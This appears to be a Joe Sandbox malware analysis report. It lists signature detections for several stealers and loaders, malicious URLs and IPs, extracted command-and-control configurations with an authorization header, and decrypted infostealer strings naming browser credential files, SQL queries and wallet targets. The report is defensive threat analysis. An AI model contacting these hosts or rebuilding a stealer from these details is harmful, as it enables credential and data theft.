6.0.907.exe.c30000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x2779ef:$s1: file:/// 0x2778ff:$s2: {11111-22222-10009-11112} 0x27797f:$s3: {11111-22222-50001-00000} 0x24d559:$s4: get_Module 0x231e1b:$s5: Reverse 0x25d09a:$s6: BlockCopy 0x24b1bb:$s7: ReadByte 0x277a01:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.W73PCbSH71.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.2.907.exe.4d047f0.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
34.3.dialer.exe.1b8f65f0000.5.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
37.2.9234.exe.1c540000.9.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.907.exe.4d3b620.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.0.W73PCbSH71.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
37.2.9234.exe.1c110000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
37.2.9234.exe.1c540000.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
34.3.dialer.exe.1b8f6310000.4.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2dd0e67.8.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
16.0.BroomSetup.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.36c0000.0.unpack	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Click to see the 24 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: W73PCbSH71.exe

Avira: detected

Antivirus detection for URL or domain

Source: politefrightenpowoa.pw	URL Reputation: Label: malware
Source: http://soupinterestoe.fun/T	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/6	Avira URL Cloud: Label: malware
Source: http://192.186.7.211:2001/	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/f	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/V	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/d	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apih	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apim	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apin	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apiw	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun:80/api	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apiK	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun//	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apiY	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/BHCNg2	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/apic	Avira URL Cloud: Label: malware
Source: http://soupinterestoe.fun/#	Avira URL Cloud: Label: malware
Source: http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://5.42.64.35/syncUpd.exeSystem32	Avira URL Cloud: Label: malware
Source: http://5.42.66.58/f059ec3d7eb90876/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://5.42.66.58/f059ec3d7eb90876/freebl3.dll	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://185.215.113.68/fks/index.php", "http://185.215.113.68/fks/index.php"]}
Source: 00000006.00000002.1919407201.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "195.20.16.103:18305", "Bot Id": "666", "Authorization Header": "6a285b1c7a795c394e7d6aadc56f52aa"}
Source: 0000001E.00000003.2191639090.0000000000950000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://5.42.66.58/3886d2276f6914c4.php"}

Multi AV Scanner detection for domain / URL

Source: chincenterblandwka.pw	Virustotal: Detection: 7%	Perma Link
Source: host-host-file8.com	Virustotal: Detection: 19%	Perma Link
Source: soupinterestoe.fun	Virustotal: Detection: 19%	Perma Link
Source: host-file-host6.com	Virustotal: Detection: 19%	Perma Link
Source: http://soupinterestoe.fun/6	Virustotal: Detection: 12%	Perma Link
Source: http://192.186.7.211:2001/	Virustotal: Detection: 5%	Perma Link
Source: http://soupinterestoe.fun/f	Virustotal: Detection: 19%	Perma Link
Source: http://soupinterestoe.fun/	Virustotal: Detection: 19%	Perma Link
Source: http://soupinterestoe.fun/d	Virustotal: Detection: 19%	Perma Link
Source: http://soupinterestoe.fun/apin	Virustotal: Detection: 15%	Perma Link
Source: http://soupinterestoe.fun/apim	Virustotal: Detection: 15%	Perma Link
Source: http://soupinterestoe.fun/apiw	Virustotal: Detection: 18%	Perma Link
Source: http://soupinterestoe.fun:80/api	Virustotal: Detection: 23%	Perma Link
Source: http://soupinterestoe.fun/apiK	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: W73PCbSH71.exe	ReversingLabs: Detection: 78%
Source: W73PCbSH71.exe	Virustotal: Detection: 81%			Perma Link

Yara detected Glupteba

Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2dd0e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.36c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 6508, type: MEMORYSTR

Machine Learning detection for sample

Source: W73PCbSH71.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetProcAddress
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: LoadLibraryA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: lstrcatA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: OpenEventA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CreateEventA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CloseHandle
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Sleep
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: VirtualFree
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetSystemInfo
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: VirtualAlloc
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: HeapAlloc
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetComputerNameA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: lstrcpyA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetProcessHeap
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetCurrentProcess
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: lstrlenA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ExitProcess
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetSystemTime
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: advapi32.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: gdi32.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: user32.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: crypt32.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ntdll.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetUserNameA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CreateDCA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetDeviceCaps
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ReleaseDC
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sscanf
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: VMwareVMware
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: HAL9TH
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: JohnDoe
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: DISPLAY
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: default4
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetFileAttributesA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GlobalLock
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: HeapFree
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetFileSize
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GlobalSize
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: IsWow64Process
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Process32Next
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetLocalTime
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: FreeLibrary
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetVolumeInformationA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Process32First
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetModuleFileNameA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: DeleteFileA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: FindNextFileA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: LocalFree
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: FindClose
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: LocalAlloc
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetFileSizeEx
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ReadFile
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SetFilePointer
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: WriteFile
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CreateFileA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: FindFirstFileA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CopyFileA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: VirtualProtect
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetLastError
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: lstrcpynA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: MultiByteToWideChar
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GlobalFree
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: WideCharToMultiByte
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GlobalAlloc
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: OpenProcess
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: TerminateProcess
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetCurrentProcessId
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: gdiplus.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ole32.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: bcrypt.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: wininet.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: shell32.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: psapi.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: rstrtmgr.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SelectObject
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: BitBlt
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: DeleteObject
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CreateCompatibleDC
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GdiplusStartup
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GdiplusShutdown
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GdipDisposeImage
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GdipFree
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CoUninitialize
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CoInitialize
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CoCreateInstance
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: BCryptDecrypt
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: BCryptSetProperty
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: BCryptDestroyKey
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetWindowRect
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetDesktopWindow
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetDC
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CloseWindow
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: wsprintfA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CharToOemW
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: wsprintfW
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RegQueryValueExA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RegEnumKeyExA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RegOpenKeyExA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RegCloseKey
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RegEnumValueA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CryptUnprotectData
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SHGetFolderPathA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ShellExecuteExA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: InternetOpenUrlA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: InternetConnectA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: InternetCloseHandle
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: InternetOpenA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: HttpSendRequestA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: HttpOpenRequestA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: InternetReadFile
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: InternetCrackUrlA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: StrCmpCA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: StrStrA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: StrCmpCW
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: PathMatchSpecA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RmStartSession
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RmRegisterResources
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RmGetList
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: RmEndSession
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3_open
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3_step
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3_column_text
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3_finalize
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3_close
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3_column_blob
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: encrypted_key
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: browser:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: profile:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: login:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: password:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Opera
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: OperaGX
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Network
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: cookies
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: FALSE
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: autofill
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: history
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: month:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Cookies
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Login Data
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: History
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: logins.json
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: formSubmitURL
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: usernameField
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: encryptedUsername
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: encryptedPassword
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: formhistory.sqlite
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: cookies.sqlite
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: places.sqlite
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: plugins
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Local Extension Settings
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: IndexedDB
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Opera Stable
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Opera GX Stable
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: CURRENT
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: chrome-extension_
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Local State
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: profiles.ini
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: chrome
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: opera
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: firefox
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: wallets
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ProductName
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: DisplayName
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ProcessorNameString
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: DisplayVersion
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Network Info:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: System Summary:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Installed Apps:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Current User:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Process List:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: system_info.txt
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: freebl3.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: mozglue.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: msvcp140.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: softokn3.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: vcruntime140.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: runas
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: files
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Telegram
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Password
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Pidgin
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: accounts.xml
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: dQw4w9WgXcQ
